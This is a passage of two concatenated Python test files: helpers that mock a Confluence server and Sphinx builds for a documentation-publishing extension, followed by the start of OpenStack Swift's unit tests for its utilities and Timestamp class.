any) populated into the server instance. If no responses are provided, the default response will be a 500 error with no data. """ def do_DELETE(self): """ serve a delete request This method is called when a DELETE request is being processed by this handler. """ with self.server.mtx: self.server.del_req.append((self.path, dict(self.headers))) try: code = self.server.del_rsp.pop(0) except IndexError: code = 500 self.send_response(code) self.end_headers() def do_GET(self): """ serve a get request This method is called when a GET request is being processed by this handler. """ with self.server.mtx: self.server.get_req.append((self.path, dict(self.headers))) try: code, data = self.server.get_rsp.pop(0) except IndexError: code = 500 data = None self.send_response(code) self.end_headers() if data: self.wfile.write(data) def do_PUT(self): """ serve a put request This method is called when a PUT request is being processed by this handler. """ with self.server.mtx: self.server.put_req.append((self.path, dict(self.headers))) try: code, data = self.server.put_rsp.pop(0) except IndexError: code = 500 data = None self.send_response(code) self.end_headers() if data: self.wfile.write(data) class MockedConfig(dict): """ mocked sphinx configuration Provides a class to mock a Sphinx configuration for testing, to support both dictionary key and attribute calls. """ def __getattr__(self, name): if name in self: return self[name] return None def __setattr__(self, name, value): self[name] = value def clone(self): cloned = MockedConfig() for key, value in self.items(): if value is None or callable(value): cloned[key] = value else: cloned[key] = deepcopy(value) return cloned def enable_sphinx_info(verbosity=None): """ enable verbosity for features handled by this utility class When invoked, this utility class will attempt to prepare or invoke requests in a verbose manner. Args: verbosity (optional): configure verbosity on the sphinx application """ os.environ['SPHINX_STATUS'] = '1' if verbosity: os.environ['SPHINX_VERBOSITY'] = str(verbosity) @contextmanager def mock_confluence_instance(config=None, ignore_requests=False): """ spawns a mocked confluence instance which publishing attempts to be checked The following spawns a mocked Confluence instance, which will create an local HTTP server to serve API requests from a publisher instance. Args: config (optional): the configuration to populate a publisher url on ignore_requests (optional): whether or not requests made to the server should be ignored (default: ``False``) Yields: the http daemon """ serve_thread = None try: # spawn a mocked server instance daemon = ConfluenceInstanceServer() host, port = daemon.server_address if config: config.confluence_server_url = 'http://{}:{}/'.format(host, port) # start accepting requests if not ignore_requests: sync = Event() def serve_forever(daemon, sync): sync.set() daemon.serve_forever() serve_thread = Thread(target=serve_forever, args=(daemon, sync,)) serve_thread.start() # wait for the serving thread to be running sync.wait() # yeild context for a moment to help ensure the daemon is serving time.sleep(0.1) yield daemon finally: if serve_thread: daemon.shutdown() serve_thread.join() else: daemon.socket.close() @contextmanager def mock_getpass(mock): def _(prompt='Password: ', stream=sys.stdout): stream.write(prompt) stream.write('(mocked input> ') stream.write(mock) stream.write('\n') return mock try: original = util.getpass2 try: util.getpass2 = _ yield finally: util.getpass2 = original finally: pass @contextmanager def mock_input(mock): def _(prompt=''): print(prompt + '(mocked input> ' + mock) return mock try: original = compat.compat_input try: compat.compat_input = _ yield finally: compat.compat_input = original finally: pass @contextmanager def parse(filename, dirname=None): """ parse the output of a generated sphinx document Parses the provided filename for generated Confluence-supported markup which can be examined for expected content. This function will return an instance of BeautifulSoup which a tester can take advantage of the utility calls the library provides. Args: filename: the filename to parse dirname (optional): the directory the provided filename exists in Returns: the parsed output """ if dirname: target = os.path.join(dirname, filename) else: target = filename target += '.conf' with open(target, 'r') as fp: soup = BeautifulSoup(fp, 'html.parser') yield soup def prepare_conf(): """ prepare minimal sphinx configuration for sphinx application Prepares a minimum number of required configuration values into a dictionary for unit tests to extend. This dictionary can be passed into a Sphinx application instance. """ config = MockedConfig() config['extensions'] = [ EXT_NAME, # include any forced-injected extensions (config support) 'sphinx.ext.imgmath', ] config['confluence_publish'] = False # support pre-Sphinx v2.0 installations which default to 'contents' if parse_version(sphinx_version) < parse_version('2.0'): config['master_doc'] = 'index' return config def prepare_dirs(container=None, f_back_count=1, postfix=None): """ return the output directory base for all unit tests This utility method is used to provide other tests the location to store output files. This method will ensure the output directory is removed before returning. Args: container (optional): the output container name to use f_back_count (optional): number of frame objects to move back when attempting to auto-generate a container name postfix (optional): postfix to add to the container directory Returns: the output directory """ if not container: frame = inspect.currentframe() for _ in range(f_back_count): frame = frame.f_back container = frame.f_code.co_name lib_dir = os.path.dirname(os.path.realpath(__file__)) test_dir = os.path.join(lib_dir, os.pardir) base_dir = os.path.join(test_dir, os.pardir) output_dir = os.path.join(base_dir, 'output') container_dir = os.path.abspath(os.path.join(output_dir, container)) if postfix: container_dir += postfix shutil.rmtree(container_dir, ignore_errors=True) return container_dir @contextmanager def prepare_sphinx(src_dir, config=None, out_dir=None, extra_config=None, builder=None, relax=False): """ prepare a sphinx application instance Return a prepared Sphinx application instance [1] ready for execution. [1]: https://github.com/sphinx-doc/sphinx/blob/master/sphinx/application.py Args: src_dir: document sources config (optional): configuration to use out_dir (optional): output for generated documents extra_config (optional): additional configuration data to apply builder (optional): the builder to use relax (optional): do not generate warnings as errors """ # Enable coloring of warning and other messages. Note that this can # cause sys.stderr to be mocked which is why we pass the new value # explicitly on the call to Sphinx() below. if 'MSYSTEM' not in os.environ and not color_terminal(): nocolor() conf = dict(config) if config else {} if extra_config: conf.update(extra_config) conf_dir = src_dir if config is None else None warnerr = not relax sts = None if 'SPHINX_STATUS' in os.environ: sts = sys.stdout verbosity = 0 if 'SPHINX_VERBOSITY' in os.environ: try: verbosity = int(os.environ['SPHINX_VERBOSITY']) except ValueError: pass # default to using this extension's builder if not builder: builder = 'confluence' if not out_dir: # 3 = prepare_dirs, this, contextmanager out_dir = prepare_dirs(f_back_count=3) doctrees_dir = os.path.join(out_dir, '.doctrees') # support pre-Sphinx v4.0 installations which do not have `root_doc` by # swapping to the obsolete configuration name if parse_version(sphinx_version) < parse_version('4.0'): if 'root_doc' in conf: conf['master_doc'] = conf['root_doc'] del conf['root_doc'] with docutils_namespace(): app = Sphinx( src_dir, # output for document sources conf_dir, # configuration directory out_dir, # output for generated documents doctrees_dir, # output for doctree files builder, # builder to execute confoverrides=conf, # load provided configuration (volatile) status=sts, # status output warning=sys.stderr, # warnings output warningiserror=warnerr, # treat warnings as errors verbosity=verbosity) # verbosity yield app def prepare_sphinx_filenames(src_dir, filenames, configs=None): """ prepare explicit filenames for a sphinx application instance A Sphinx engine allows accepting a list of filenames it will process; however, these filenames need to be set to full paths. This is not always convenient for testing, so this utility allows generating a filename list with the source directory prefixed for each entry. In addition, when passing a documentation set to process, Sphinx requires that the documentation set has an existing root document. In some testing datasets, they may not have one that exists. If this is detected, this helper will adjust the configuration to adjust the root document to a provided filename, which should prevent issues when the Sphinx application prepares an environment. This is only performed when configurations are provided in to this call. Multiple configuration entries can be provided, and only the last configuration entry (must exist and) will be updated in the event when a change is needed. Args: src_dir: document sources filenames: the documents to process relative to src_dir (no extensions) configs (optional): list of configurations to check for root doc issue Returns: the updated file name list """ files = [] for filename in filenames: files.append(os.path.join(src_dir, filename + '.rst')) if configs: root_doc = 'index' for config in configs: if config and 'root_doc' in config: root_doc = config['root_doc'] break if root_doc not in filenames: configs[-1]['root_doc'] = filenames[0] # update last config return files def build_sphinx(src_dir, config=None, out_dir=None, extra_config=None, builder=None, relax=False, filenames=None): """ prepare a sphinx application instance Creates, invokes and cleans up a Sphinx application instance [1]. [1]: https://github.com/sphinx-doc/sphinx/blob/master/sphinx/application.py Args: src_dir: document sources config (optional): configuration to use out_dir (optional): output for generated documents extra_config (optional): additional configuration data to apply builder (optional): the builder to use relax (optional): do not generate warnings as errors filenames (optional): specific documents to process Returns: the output directory """ if not out_dir: # 2 = prepare_dirs, this out_dir = prepare_dirs(f_back_count=2) files = [] force_all = True if filenames: # force-all not supported when using explicit filenames force_all = False # sphinx application requires full paths for explicit filenames extra_config = dict(extra_config) if extra_config else {} files = prepare_sphinx_filenames(src_dir, filenames, configs=(config, extra_config)) with prepare_sphinx( src_dir, config=config, out_dir=out_dir, extra_config=extra_config, builder=builder, relax=relax) as app: app.build(force_all=force_all, filenames=files) return out_dir
test_utils.py
# Copyright (c) 2010-2012 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for swift.common.utils""" from __future__ import print_function import hashlib from test.unit import temptree, debug_logger, make_timestamp_iter, \ with_tempdir, mock_timestamp_now import ctypes import contextlib import errno import eventlet import eventlet.debug import eventlet.event import eventlet.patcher import functools import grp import logging import platform import os import mock import posix import pwd import random import re import socket import string import sys import json import math import inspect import six from six import StringIO from six.moves.queue import Queue, Empty from six.moves import http_client from six.moves import range from textwrap import dedent import tempfile import time import unittest import fcntl import shutil from getpass import getuser from io import BytesIO from shutil import rmtree from functools import partial from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp from netifaces import AF_INET6 from mock import MagicMock, patch from six.moves.configparser import NoSectionError, NoOptionError from uuid import uuid4 from swift.common.exceptions import Timeout, MessageTimeout, \ ConnectionTimeout, LockTimeout, ReplicationLockTimeout, \ MimeInvalid from swift.common import utils from swift.common.utils import is_valid_ip, is_valid_ipv4, is_valid_ipv6, \ set_swift_dir from swift.common.container_sync_realms import ContainerSyncRealms from swift.common.header_key_dict import HeaderKeyDict from swift.common.storage_policy import POLICIES, reload_storage_policies from swift.common.swob import Request, Response from test.unit import FakeLogger, requires_o_tmpfile_support_in_tmp, \ quiet_eventlet_exceptions threading = eventlet.patcher.original('threading') class MockOs(object): def __init__(self, pass_funcs=None, called_funcs=None, raise_funcs=None): if pass_funcs is None: pass_funcs = [] if called_funcs is None: called_funcs = [] if raise_funcs is None: raise_funcs = [] self.closed_fds = [] for func in pass_funcs: setattr(self, func, self.pass_func) self.called_funcs = {} for func in called_funcs: c_func = partial(self.called_func, func) setattr(self, func, c_func) for func in raise_funcs: r_func = partial(self.raise_func, func) setattr(self, func, r_func) def pass_func(self, *args, **kwargs): pass setgroups = chdir = setsid = setgid = setuid = umask = pass_func def called_func(self, name, *args, **kwargs): self.called_funcs[name] = args def raise_func(self, name, *args, **kwargs): self.called_funcs[name] = args raise OSError() def dup2(self, source, target): self.closed_fds.append(target) def geteuid(self): '''Pretend we are running as root.''' return 0 def __getattr__(self, name): # I only over-ride portions of the os module try: return object.__getattr__(self, name) except AttributeError: return getattr(os, name) class MockUdpSocket(object): def __init__(self, sendto_errno=None): self.sent = [] self.sendto_errno = sendto_errno def sendto(self, data, target): if self.sendto_errno: raise socket.error(self.sendto_errno, 'test errno %s' % self.sendto_errno) self.sent.append((data, target)) def close(self): pass class MockSys(object): def __init__(self): self.stdin = TemporaryFile('w') self.stdout = TemporaryFile('r') self.stderr = TemporaryFile('r') self.__stderr__ = self.stderr self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(), self.stderr.fileno()] def reset_loggers(): if hasattr(utils.get_logger, 'handler4logger'): for logger, handler in utils.get_logger.handler4logger.items(): logger.removeHandler(handler) delattr(utils.get_logger, 'handler4logger') if hasattr(utils.get_logger, 'console_handler4logger'): for logger, h in utils.get_logger.console_handler4logger.items(): logger.removeHandler(h) delattr(utils.get_logger, 'console_handler4logger') # Reset the LogAdapter class thread local state. Use get_logger() here # to fetch a LogAdapter instance because the items from # get_logger.handler4logger above are the underlying logger instances, # not the LogAdapter. utils.get_logger(None).thread_locals = (None, None) def reset_logger_state(f): @functools.wraps(f) def wrapper(self, *args, **kwargs): reset_loggers() try: return f(self, *args, **kwargs) finally: reset_loggers() return wrapper class TestUTC(unittest.TestCase): def test_tzname(self): self.assertEqual(utils.UTC.tzname(None), 'UTC') class TestTimestamp(unittest.TestCase): """Tests for swift.common.utils.Timestamp""" def test_invalid_input(self): self.assertRaises(ValueError, utils.Timestamp, time.time(), offset=-1) self.assertRaises(ValueError, utils.Timestamp, '123.456_78_90') def test_invalid_string_conversion(self): t = utils.Timestamp.now() self.assertRaises(TypeError, str, t) def test_offset_limit(self): t = 1417462430.78693 # can't have a offset above MAX_OFFSET self.assertRaises(ValueError, utils.Timestamp, t, offset=utils.MAX_OFFSET + 1) # exactly max offset is fine ts = utils.Timestamp(t, offset=utils.MAX_OFFSET) self.assertEqual(ts.internal, '1417462430.78693_ffffffffffffffff') # but you can't offset it further self.assertRaises(ValueError, utils.Timestamp, ts.internal, offset=1) # unless you start below it ts = utils.Timestamp(t, offset=utils.MAX_OFFSET - 1) self.assertEqual(utils.Timestamp(ts.internal, offset=1), '1417462430.78693_ffffffffffffffff') def test_normal_format_no_offset(self): expected = '1402436408.91203' test_values = ( '1402436408.91203', '1402436408.91203_00000000', '1402436408.912030000', '1402436408.912030000_0000000000000', '000001402436408.912030000', '000001402436408.912030000_0000000000', 1402436408.91203, 1402436408.912029, 1402436408.9120300000000000, 1402436408.91202999999999999, utils.Timestamp(1402436408.91203), utils.Timestamp(1402436408.91203, offset=0), utils.Timestamp(1402436408.912029), utils.Timestamp(1402436408.912029, offset=0), utils.Timestamp('1402436408.91203'), utils.Timestamp('1402436408.91203', offset=0), utils.Timestamp('1402436408.91203_00000000'), utils.Timestamp('1402436408.91203_00000000', offset=0), ) for value in test_values: timestamp = utils.Timestamp(value) self.assertEqual(timestamp.normal, expected) # timestamp instance can also compare to string or float self.assertEqual(timestamp, expected) self.assertEqual(timestamp, float(expected)) self.assertEqual(timestamp, utils.normalize_timestamp(expected)) def test_isoformat(self): expected = '2014-06-10T22:47:32.054580' test_values = ( '1402440452.05458', '1402440452.054579', '1402440452.05458_00000000', '1402440452.054579_00000000', '1402440452.054580000', '1402440452.054579999', '1402440452.054580000_0000000000000', '1402440452.054579999_0000ff00', '000001402440452.054580000', '000001402440452.0545799', '000001402440452.054580000_0000000000', '000001402440452.054579999999_00000fffff', 1402440452.05458, 1402440452.054579, 1402440452.0545800000000000, 1402440452.054579999, utils.Timestamp(1402440452.05458), utils.Timestamp(1402440452.0545799), utils.Timestamp(1402440452.05458, offset=0), utils.Timestamp(1402440452.05457999999, offset=0), utils.Timestamp(1402440452.05458, offset=100), utils.Timestamp(1402440452.054579, offset=100), utils.Timestamp('1402440452.05458'), utils.Timestamp('1402440452.054579999'), utils.Timestamp('1402440452.05458', offset=0), utils.Timestamp('1402440452.054579', offset=0), utils.Timestamp('1402440452.05458', offset=300), utils.Timestamp('1402440452.05457999', offset=300), utils.Timestamp('1402440452.05458_00000000'), utils.Timestamp('1402440452.05457999_00000000'), utils.Timestamp('1402440452.05458_00000000', offset=0), utils.Timestamp('1402440452.05457999_00000aaa', offset=0), utils.Timestamp('1402440452.05458_00000000', offset=400), utils.Timestamp('1402440452.054579_0a', offset=400), ) for value in test_values: self.assertEqual(utils.Timestamp(value).isoformat, expected) expected = '1970-01-01T00:00:00.000000' test_values = ( '0', '0000000000.00000', '0000000000.00000_ffffffffffff', 0, 0.0, ) for value in test_values: self.assertEqual(utils.Timestamp(value).isoformat, expected) def test_not_equal(self): ts = '1402436408.91203_0000000000000001' test_values = ( utils.Timestamp('1402436408.91203_0000000000000002'), utils.Timestamp('1402436408.91203'), utils.Timestamp(1402436408.91203), utils.Timestamp(1402436408.91204), utils.Timestamp(1402436408.91203, offset=0), utils.Timestamp(1402436408.91203, offset=2), ) for value in test_values: self.assertTrue(value != ts) self.assertIs(True, utils.Timestamp(ts) == ts) # sanity self.assertIs(False, utils.Timestamp(ts) != utils.Timestamp(ts)) self.assertIs(False, utils.Timestamp(ts) != ts) self.assertIs(False, utils.Timestamp(ts) is None) self.assertIs(True, utils.Timestamp(ts) is not None) def test_no_force_internal_no_offset(self): """Test that internal is the same as normal with no offset""" with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False): self.assertEqual(utils.Timestamp(0).internal, '0000000000.00000') self.assertEqual(utils.Timestamp(1402437380.58186).internal, '1402437380.58186') self.assertEqual(utils.Timestamp(1402437380.581859).internal, '1402437380.58186') self.assertEqual(utils.Timestamp(0).internal, utils.normalize_timestamp(0)) def test_no_force_internal_with_offset(self): """Test that internal always includes the offset if significant""" with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False): self.assertEqual(utils.Timestamp(0, offset=1).internal, '0000000000.00000_0000000000000001') self.assertEqual( utils.Timestamp(1402437380.58186, offset=16).internal, '1402437380.58186_0000000000000010') self.assertEqual( utils.Timestamp(1402437380.581859, offset=240).internal, '1402437380.58186_00000000000000f0') self.assertEqual( utils.Timestamp('1402437380.581859_00000001', offset=240).internal, '1402437380.58186_00000000000000f1') def test_force_internal(self): """Test that internal always includes the offset if forced""" with mock.patch('swift.common.utils.FORCE_INTERNAL', new=True): self.assertEqual(utils.Timestamp(0).internal, '0000000000.00000_0000000000000000') self.assertEqual(utils.Timestamp(1402437380.58186).internal, '1402437380.58186_0000000000000000') self.assertEqual(utils.Timestamp(1402437380.581859).internal, '1402437380.58186_0000000000000000') self.assertEqual(utils.Timestamp(0, offset=1).internal, '0000000000.00000_0000000000000001') self.assertEqual( utils.Timestamp(1402437380.58186, offset=16).internal, '1402437380.58186_0000000000000010') self.assertEqual( utils.Timestamp(1402437380.581859, offset=16).internal, '1402437380.58186_0000000000000010') def test_internal_format_no_offset(self): expected = '1402436408.91203_0000000000000000' test_values = ( '1402436408.91203', '1402436408.91203_00000000', '1402436408.912030000', '1402436408.912030000_0000000000000', '000001402436408.912030000', '000001402436408.912030000_0000000000', 1402436408.91203, 1402436408.9120300000000000, 1402436408.912029, 1402436408.912029999999999999, utils.Timestamp(1402436408.91203), utils.Timestamp(1402436408.91203, offset=0), utils.Timestamp(1402436408.912029), utils.Timestamp(1402436408.91202999999999999, offset=0), utils.Timestamp('1402436408.91203'), utils.Timestamp('1402436408.91203', offset=0), utils.Timestamp('1402436408.912029'), utils.Timestamp('1402436408.912029', offset=0), utils.Timestamp('1402436408.912029999999999'), utils.Timestamp('1402436408.912029999999999', offset=0), ) for value in test_values: # timestamp instance is always equivalent self.assertEqual(utils.Timestamp(value), expected) if utils.FORCE_INTERNAL: # the FORCE_INTERNAL flag makes the internal format always # include the offset portion of the timestamp even when it's # not significant and would be bad during upgrades self.assertEqual(utils.Timestamp(value).internal, expected) else: # unless we FORCE_INTERNAL, when there's no offset the # internal format is equivalent to the normalized format self.assertEqual(utils.Timestamp(value).internal, '1402436408.91203') def test_internal_format_with_offset(self): expected = '1402436408.91203_00000000000000f0' test_values = ( '1402436408.91203_000000f0', u'1402436408.91203_000000f0', b'1402436408.91203_000000f0', '1402436408.912030000_0000000000f0', '1402436408.912029_000000f0', '1402436408.91202999999_0000000000f0', '000001402436408.912030000_000000000f0', '000001402436408.9120299999_000000000f0', utils.Timestamp(1402436408.91203, offset=240), utils.Timestamp(1402436408.912029, offset=240), utils.Timestamp('1402436408.91203', offset=240), utils.Timestamp('1402436408.91203_00000000', offset=240), utils.Timestamp('1402436408.91203_0000000f', offset=225), utils.Timestamp('1402436408.9120299999', offset=240), utils.Timestamp('1402436408.9120299999_00000000', offset=240), utils.Timestamp('1402436408.9120299999_00000010', offset=224), ) for value in test_values: timestamp = utils.Timestamp(value) self.assertEqual(timestamp.internal, expected) # can compare with offset if the string is internalized self.assertEqual(timestamp, expected) # if comparison value only includes the normalized portion and the # timestamp includes an offset, it is considered greater normal = utils.Timestamp(expected).normal self.assertTrue(timestamp > normal, '%r is not bigger than %r given %r' % ( timestamp, normal, value)) self.assertTrue(timestamp > float(normal), '%r is not bigger than %f given %r' % ( timestamp, float(normal), value)) def test_short_format_with_offset(self): expected = '1402436408.91203_f0' timestamp = utils.Timestamp(1402436408.91203, 0xf0) self.assertEqual(expected, timestamp.short) expected = '1402436408.91203' timestamp = utils.Timestamp(1402436408.91203) self.assertEqual(expected, timestamp.short) def test_raw(self): expected = 140243640891203 timestamp = utils.Timestamp(1402436408.91203) self.assertEqual(expected, timestamp.raw) # 'raw' does not include offset timestamp = utils.Timestamp(1402436408.91203, 0xf0) self.assertEqual(expected, timestamp.raw) def test_delta(self): def _assertWithinBounds(expected, timestamp): tolerance = 0.00001 minimum = expected - tolerance maximum = expected + tolerance self.assertTrue(float(timestamp) > minimum) self.assertTrue(float(timestamp) < maximum) timestamp = utils.Timestamp(1402436408.91203, delta=100) _assertWithinBounds(1402436408.91303, timestamp) self.assertEqual(140243640891303, timestamp.raw) timestamp = utils.Timestamp(1402436408.91203, delta=-100) _assertWithinBounds(1402436408.91103, timestamp) self.assertEqual(140243640891103, timestamp.raw) timestamp = utils.Timestamp(1402436408.91203, delta=0) _assertWithinBounds(1402436408.91203, timestamp) self.assertEqual(140243640891203, timestamp.raw) # delta is independent of offset timestamp = utils.Timestamp(1402436408.91203, offset=42, delta=100) self.assertEqual(140243640891303, timestamp.raw) self.assertEqual(42, timestamp.offset) # cannot go negative self.assertRaises(ValueError, utils.Timestamp, 1402436408.91203, delta=-140243640891203) def test_int(self): expected = 1402437965 test_values = ( '1402437965.91203', '1402437965.91203_00000000', '1402437965.912030000', '1402437965.912030000_0000000000000', '000001402437965.912030000', '000001402437965.912030000_0000000000', 1402437965.91203, 1402437965.9120300000000000, 1402437965.912029, 1402437965.912029999999999999, utils.Timestamp(1402437965.91203), utils.Timestamp(1402437965.91203, offset=0), utils.Timestamp(1402437965.91203, offset=500), utils.Timestamp(1402437965.912029), utils.Timestamp(1402437965.91202999999999999, offset=0), utils.Timestamp(1402437965.91202999999999999, offset=300), utils.Timestamp('1402437965.91203'), utils.Timestamp('1402437965.91203', offset=0), utils.Timestamp('1402437965.91203', offset=400), utils.Timestamp('1402437965.912029'), utils.Timestamp('1402437965.912029', offset=0), utils.Timestamp('1402437965.912029', offset=200), utils.Timestamp('1402437965.912029999999999'), utils.Timestamp('1402437965.912029999999999', offset=0), utils.Timestamp('1402437965.912029999999999', offset=100), ) for value in test_values: timestamp = utils.Timestamp(value) self.assertEqual(int(timestamp), expected) self.assertTrue(timestamp > expected) def test_float(self): expected = 1402438115.91203 test_values = ( '1402438115.91203', '1402438115.91203_00000000', '1402438115.912030000', '1402438115.912030000_0000000000000', '000001402438115.912030000', '000001402438115.912030000_0000000000', 1402438115.91203, 1402438115.9120300000000000, 1402438115.912029, 1402438115.912029999999999999, utils.Timestamp(1402438115.91203), utils.Timestamp(1402438115.91203, offset=0), utils.Timestamp(1402438115.91203, offset=500), utils.Timestamp(1402438115.912029), utils.Timestamp(1402438115.91202999999999999, offset=0), utils.Timestamp(1402438115.91202999999999999, offset=300), utils.Timestamp('1402438115.91203'), utils.Timestamp('1402438115.91203', offset=0), utils.Timestamp('1402438115.91203', offset=400), utils.Timestamp('1402438115.912029'), utils.Timestamp('1402438115.912029', offset=0), utils.Timestamp('1402438115.912029', offset=200), utils.Timestamp('1402438115.912029999999999'), utils.Timestamp('1402438115.912029999999999', offset=0), utils.Timestamp('1402438115.912029999999999', offset=100), ) tolerance = 0.00001 minimum = expected - tolerance maximum = expected + tolerance for value in test_values: timestamp = utils.Timestamp(value) self.assertTrue(float(timestamp) > minimum, '%f is not bigger than %f given %r' % ( timestamp, minimum, value)) self.assertTrue(float(timestamp) < maximum, '%f is not smaller than %f given %r' % ( timestamp, maximum, value)) # direct comparison of timestamp works too self.assertTrue(timestamp > minimum, '%s is not bigger than %f given %r' % ( timestamp.normal, minimum, value)) self.assertTrue(timestamp < maximum, '%s is not smaller than %f given %r' % ( timestamp.normal, maximum, value)) # ... even against strings self.assertTrue(timestamp > '%f' % minimum, '%s is not bigger than %s given %r' % ( timestamp.normal, minimum, value)) self.assertTrue(timestamp < '%f' % maximum, '%s is not smaller than %s given %r' % ( timestamp.normal, maximum, value)) def test_false(self): self.assertFalse(utils.Timestamp(0)) self.assertFalse(utils.Timestamp(0, offset=0)) self.assertFalse(utils.Timestamp('0')) self.assertFalse(utils.Timestamp('0', offset=0)) self.assertFalse(utils.Timestamp(0.0)) self.assertFalse(utils.Timestamp(0.0, offset=0)) self.assertFalse(utils.Timestamp('0.0')) self.assertFalse(utils.Timestamp('0.0', offset=0)) self.assertFalse(utils.Timestamp(00000000.00000000)) self.assertFalse(utils.Timestamp(00000000.00000000, offset=0)) self.assertFalse(utils.Timestamp('00000000.00000000')) self.assertFalse(utils.Timestamp('00000000.00000000', offset=0)) def test_true(self): self.assertTrue(utils.Timestamp(1)) self.assertTrue(utils.Timestamp(1, offset=1)) self.assertTrue(utils.Timestamp(0, offset=1)) self.assertTrue(utils.Timestamp('1')) self.assertTrue(utils.Timestamp('1', offset=1)) self.assertTrue(utils.Timestamp('0', offset=1)) self.assertTrue(utils.Timestamp(1.1)) self.assertTrue(utils.Timestamp(1.1, offset=1)) self.assertTrue(utils.Timestamp(0.0, offset=1)) self.assertTrue(utils.Timestamp('1.1')) self.assertTrue(utils.Timestamp('1.1', offset=1)) self.assertTrue(utils.Timestamp('0.0', offset=1)) self.assertTrue(utils.Timestamp(11111111.11111111)) self.assertTrue(utils.Timestamp(11111111.11111111, offset=1)) self.assertTrue(utils.Timestamp(00000000.00000000, offset=1)) self.assertTrue(utils.Timestamp('11111111.11111111')) self.assertTrue(utils.Timestamp('11111111.11111111', offset=1)) self.assertTrue(utils.Timestamp('00000000.00000000', offset=1)) def test_greater_no_offset(self): now = time.time() older = now - 1 timestamp = utils.Timestamp(now) test_values = ( 0, '0', 0.0, '0.0', '0000.0000', '000.000_000', 1, '1', 1.1, '1.1', '1111.1111', '111.111_111', 1402443112.213252, '1402443112.213252', '1402443112.213252_ffff', older, '%f' % older, '%f_0000ffff' % older, ) for value in test_values: other = utils.Timestamp(value) self.assertNotEqual(timestamp, other) # sanity self.assertTrue(timestamp > value, '%r is not greater than %r given %r' % ( timestamp, value, value)) self.assertTrue(timestamp > other, '%r is not greater than %r given %r' % ( timestamp, other, value)) self.assertTrue(timestamp > other.normal, '%r is not greater than %r given %r' % ( timestamp, other.normal, value)) self.assertTrue(timestamp > other.internal, '%r is not greater than %r given %r' % ( timestamp, other.internal, value)) self.assertTrue(timestamp > float(other), '%r is not greater than %r given %r' % ( timestamp, float(other), value)) self.assertTrue(timestamp > int(other), '%r is not greater than %r given %r' % ( timestamp, int(other), value)) def _test_greater_with_offset(self, now, test_values): for offset in range(1, 1000, 100): timestamp = utils.Timestamp(now, offset=offset) for value in test_values: other = utils.Timestamp(value) self.assertNotEqual(timestamp, other) # sanity self.assertTrue(timestamp > value, '%r is not greater than %r given %r' % ( timestamp, value, value)) self.assertTrue(timestamp > other, '%r is not greater than %r given %r' % ( timestamp, other, value)) self.assertTrue(timestamp > other.normal, '%r is not greater than %r given %r' % ( timestamp, other.normal, value)) self.assertTrue(timestamp > other.internal, '%r is not greater than %r given %r' % ( timestamp, other.internal, value)) self.assertTrue(timestamp > float(other), '%r is not greater than %r given %r' % ( timestamp, float(other), value)) self.assertTrue(timestamp > int(other), '%r is not greater than %r given %r' % ( timestamp, int(other), value)) def test_greater_with_offset(self): # Part 1: use the natural time of the Python. This is deliciously # unpredictable, but completely legitimate and realistic. Finds bugs! now = time.time() older = now - 1 test_values = ( 0, '0', 0.0, '0.0', '0000.0000', '000.000_000', 1, '1', 1.1, '1.1', '1111.1111', '111.111_111', 1402443346.935174, '1402443346.93517', '1402443346.935169_ffff', older, now, ) self._test_greater_with_offset(now, test_values) # Part 2: Same as above, but with fixed time values that reproduce # specific corner cases. now = 1519830570.6949348 older = now - 1 test_values = ( 0, '0', 0.0, '0.0', '0000.0000', '000.000_000', 1, '1', 1.1, '1.1', '1111.1111', '111.111_111', 1402443346.935174, '1402443346.93517', '1402443346.935169_ffff', older, now, ) self._test_greater_with_offset(now, test_values) # Part 3: The '%f' problem. Timestamps cannot be converted to %f # strings, then back to timestamps, then compared with originals. # You can only "import" a floating point representation once. now = 1519830570.6949348 now = float('%f' % now) older = now - 1 test_values = ( 0, '0', 0.0, '0.0', '0000.0000', '000.000_000', 1, '1', 1.1, '1.1', '1111.1111', '111.111_111', older, '%f' % older, '%f_0000ffff' % older, now, '%f' % now, '%s_00000000' % now, ) self._test_greater_with_offset(now, test_values) def test_smaller_no_offset(self): now = time.time() newer = now + 1 timestamp = utils.Timestamp(now) test_values = ( 9999999999.99999, '9999999999.99999', '9999999999.99999_ffff', newer, '%f' % newer, '%f_0000ffff' % newer, ) for value in test_values: other = utils.Timestamp(value) self.assertNotEqual(timestamp, other) # sanity self.assertTrue(timestamp < value, '%r is not smaller than %r given %r' % ( timestamp, value, value)) self.assertTrue(timestamp < other, '%r is not smaller than %r given %r' % ( timestamp, other, value)) self.assertTrue(timestamp < other.normal, '%r is not smaller than %r given %r' % ( timestamp, other.normal, value)) self.assertTrue(timestamp < other.internal, '%r is not smaller than %r given %r' % ( timestamp, other.internal, value)) self.assertTrue(timestamp < float(other), '%r is not smaller than %r given %r' % ( timestamp, float(other), value)) self.assertTrue(timestamp < int(other), '%r is not smaller than %r given %r' % ( timestamp, int(other), value)) def test_smaller_with_offset(self): now = time.time() newer = now + 1 test_values = ( 9999999999.99999, '9999999999.99999', '9999999999.99999_ffff', newer, '%f' % newer, '%f_0000ffff' % newer, ) for offset in range(1, 1000, 100): timestamp = utils.Timestamp(now, offset=offset) for value in test_values: other = utils.Timestamp(value) self.assertNotEqual(timestamp, other) # sanity self.assertTrue(timestamp < value, '%r is not smaller than %r given %r' % ( timestamp, value, value)) self.assertTrue(timestamp < other, '%r is not smaller than %r given %r' % ( timestamp, other, value)) self.assertTrue(timestamp < other.normal, '%r is not smaller than %r given %r' % ( timestamp, other.normal, value)) self.assertTrue(timestamp < other.internal, '%r is not smaller than %r given %r' % ( timestamp, other.internal, value)) self.assertTrue(timestamp < float(other), '%r is not smaller than %r given %r' % ( timestamp, float(other), value)) self.assertTrue(timestamp < int(other), '%r is not smaller than %r given %r' % ( timestamp, int(other), value)) def test_cmp_with_none(self): self.assertGreater(utils.Timestamp(0), None) self.assertGreater(utils.Timestamp(1.0), None) self.assertGreater(utils.Timestamp(1.0, 42), None) def test_ordering(self): given = [ '1402444820.62590_000000000000000a', '1402444820.62589_0000000000000001', 